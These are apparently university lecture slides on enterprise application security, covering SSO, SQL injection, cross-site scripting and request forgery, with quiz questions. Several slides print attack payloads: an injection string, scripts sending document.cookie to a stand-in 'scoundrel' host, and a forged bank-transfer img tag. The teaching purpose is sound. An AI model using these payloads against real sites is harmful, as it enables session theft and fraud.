1 / 27

Building Enterprise Applications: Security Issues Outline notes only

Building Enterprise Applications: Security Issues Outline notes only. Security issues: General. A huge topic that we can only touch on and is also addressed elsewhere in module Any platform must support six key security aspects (revision): Authentication (and mutual authentication)

vlora
Download Presentation

Building Enterprise Applications: Security Issues Outline notes only

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Building Enterprise Applications:Security IssuesOutline notes only

  2. Security issues: General • A huge topic that we can only touch on and is also addressed elsewhere in module • Any platform must support six key security aspects (revision): • Authentication (and mutual authentication) • Authorisation • Data confidentiality • Data integrity • Non-repudiation • Auditing CS37420: Security Issues

  3. What is authentication? (Choose the most accurate option) • Provision of a subject’s identity and private security attributes to a system to enable that subject entry into that system • The process of deciding whether a subject is allowed to access a specific server-side resource based on their security role CS37420: Security Issues

  4. What is authorisation? (Choose the most accurate option) • Provision of a subject’s identity and private security attributes to a system to enable that subject entry into that system • The process of deciding whether a subject is allowed to access a specific server-side resource based on their security role CS37420: Security Issues

  5. What is data confidentiality? (Choose all that apply) • Having confidence that data is accurate • Ensuring that sensitive data sent across the network can only be read by the intended receiver • Ensuring that sensitive data that is stored can only be read by those allowed to do so • Another answer CS37420: Security Issues

  6. In the context of distribution, how might data integrity be maintained? (Choose all that apply) • The use of security mechanisms to prevent malicious tampering with data in transit • The use of security mechanisms to prevent malicious tampering with data stored on the server • The use of security mechanisms to prevent accidental corruption of data in transit CS37420: Security Issues

  7. In the context of enterprise applications what does non-repudiation mean? (Choose the most accurate) • Neither the end user nor the application owner can deny that the user who accessed an application service did not use that service • The application owner has a record of business transactions so that the owner can prove that a service has been used by a particular user CS37420: Security Issues

  8. Security: Single sign-on • Purpose is to avoid the need to repeatedly request credentials from end users when they use a set of services: e.g. a set of services offered on a portal web site • The end user is prompted once for credentials and authenticated by primary security domain that then communicates with other secondary security domains CS37420: Security Issues

  9. Security: Single sign-on • Reduces time taken by end users • Removes need for an end user to maintain multiple sets of credentials • Easier for administrators to manage user accounts and user authorisation rights • Requires secure lines of trust between such integrated services and therefore allows for interoperability that would otherwise be difficult if not impossible CS37420: Security Issues

  10. Solution: End user authenticates once during login session • When accesses other applications that participate in SSO they check against the primary authentication service to see if authenticated and what user’s authorisation rights are • One way achieved on web is to return a token as a cookie CS37420: Security Issues

  11. Standards in this area: SAML (Security Assertion Markup Language) • Important implementation: Shibboleth (discussed briefly in class) CS37420: Security Issues

  12. Security: SQL injection attacks • Unwanted injection of SQL into an enterprise application by attackers in order to obtain confidential data or compromise the database’s integrity • Can happen in any computer language that constructs a SQL statement from string literals and incoming data that contains SQL meta (e.g. escape) characters CS37420: Security Issues

  13. Security: SQL injection attacks statement = “SELECT * FROM emails WHERE uid = ‘ ” + uid + “ ’ ” and then inserting data: cwl’ or ‘t’ = ‘t giving: statement = “SELECT * FROM emails WHERE uid = ‘cwl’ or ‘t’ = ‘t’ ” CS37420: Security Issues

  14. Two case studies discussed in class • Netbeans based Java examples looked at in class CS37420: Security Issues

  15. Security: SQL injection attacks • Techniques to help address this: • Use functions/methods to quote all meta characters so that they are not interpreted as meta characters in SQL statements • Use SQL statement parameterisation where supported (e.g. Java prepared statements) • Use stored procedures rather than constructing SQL on the fly • Validate all user input! CS37420: Security Issues

  16. Security: Cross-site scripting (XSS) attacks • Attackers find clever ways of injecting malicious script (usually JavaScript) into web pages served by other domains allowing access to sensitive data associated with those pages (e.g. cookie data) • Following slides describe two basic kinds of XSS attack CS37420: Security Issues

  17. Security: Cross-site scripting (XSS) attacks • Reflective/Non-persistent XSS: • Most common type of attack • HTML sent to the server is not validated and used as part of the results sent back to the client, possibly containing malicious script code • Requires social engineering to trick a user to follow a “malicious” link to a rogue site • See www.xssed.com/archive for examples of real sites that interpret JS embedded in URLs • Example that takes advantage of the echo service vulnerability shown on next slide: CS37420: Security Issues

  18. XSS example http://target.com http://scoundrel.com 2: HTTP response is: <form action=“http://target.com:7” method=“post”> <input type=“submit” onClick=“some JS”\> </form> 1: Tricked into visiting site 3: Sent to echo server on port 7 4: Echoes back the form HTML along with target.com cookies that the JavaScript can access End user browser Make sure the echo service is disabled on HTTP server! CS37420: Security Issues

  19. Security: Cross-site scripting (XSS) attacks • Stored/Persistent XSS (define by example): • Un-validated client feedback data including HTML with a malicious script is stored in a server-side database • At a later date an administrator logs in and displays the feedback on her browser • The script is run and sends the administrator’s cookie data to a different site: <script> document.location=“http://scoundrel.domain/capture/” + document.cookie </script> CS37420: Security Issues

  20. Persistent XSS example 2 3: HTTP request: feedback data containing JavaScript http://naive.com User Browser /feedback servlet 4: Store in feedback table 1: HTTP request 2: HTTP response: feedback form /admin servlet 6: Read from feedback table 5: HTTP request Admin Browser http://scoundrel.com 7: HTTP response: Feedback data including JavaScript. Also cookies /capture servlet 8: HTTP request: JS redirects to /capture with Cookie info appended 9: HTTP response: Reads cookie data from end or URL and sends back as part of HTML

  21. Security: Cross-site request forgery attacks • XSS exploits the trust a user has for a particular site... • XSRF exploits the trust a site has in a user’s browser • E.g. Hidden image tag with form: <img src=“http://mybank.com/transfer?from=myaccount&to=attackersAccount”> CS37420: Security Issues

  22. XSRF • Assumptions: • There is a site, e.g. mybank.com, that can be used to provide some benefit to the attacker, e.g. transfer of funds • The site does not check the HTTP Referrer header to check that this request is following a link for the same site. • The user is logged on to the site, whilst browsing other sites. • The attacker is able to determine the correct values to send in the attack, e.g. what are the items in the URL request such as from and to bank account or what is in a form submission. • The victim is tricked into viewing content that includes a link, such as the one on the previous slide. • E.g. viewing content on social network site. • Operation proceeds without the knowledge of the victim. CS37420: Security Issues

  23. Study the following SQL code.“SELECT * FROM emails WHERE email = ‘” + emailStr + “’”The “+” operator concatenates strings. The intention of the programmer is to allow the browser user to input of an email identifier that causes a database lookup that returns data about the user represented by that email. Assume that the variable emailStr contains the string: “cwl@aber.ac.uk’ or ‘t’ = ‘t” .What database result will be generated by this query? • A copy of the database row for cwl • No data will be returned because the input data is badly formed • All rows in the emails table are returned CS37420: Security Issues

  24. A reflected XSS attack is achieved by (choose all that apply): • Uploading HTML with Javascript to a server which is then saved and accessed and reflected on a browser during a later session • An HTTP request containing Javascript is included in the HTTP response results • Tricking a user using a phishing attack to click on a URL

  25. True or False Validating user input in the browser is both a good idea and sufficient CS37420: Security Issues

  26. As part of a stored XSS attack the browser receives back a page of HTML containing:<script>window.location= "http://scoundrel.com:8080/Scoundrel/capture/" + document.cookie.replace(";", "");</script>What happens in the receiver’s browser? • The browser makes an HTTP request to scoundrel.com that contains the current page’s cookies as part of the request. The user is unaware that the request occurred • The browser makes an HTTP request to scoundrel.com that contains the current page’s cookies as part of the request. The user is aware that the request occurred CS37420: Security Issues

  27. For XSRF cross site forgery to succeed at least the following conditions must apply (choose all that apply): • Social engineering is used to trick the user to visit the attacker’s web site • Javascript must be switched on • The attacked site fails to validate the referrer request header • There are operations exposed by the attacked enterprise application that do something useful or profitable for the attacker • The attacker can determine the parameters and their values required by the operations being targeted CS37420: Security Issues

More Related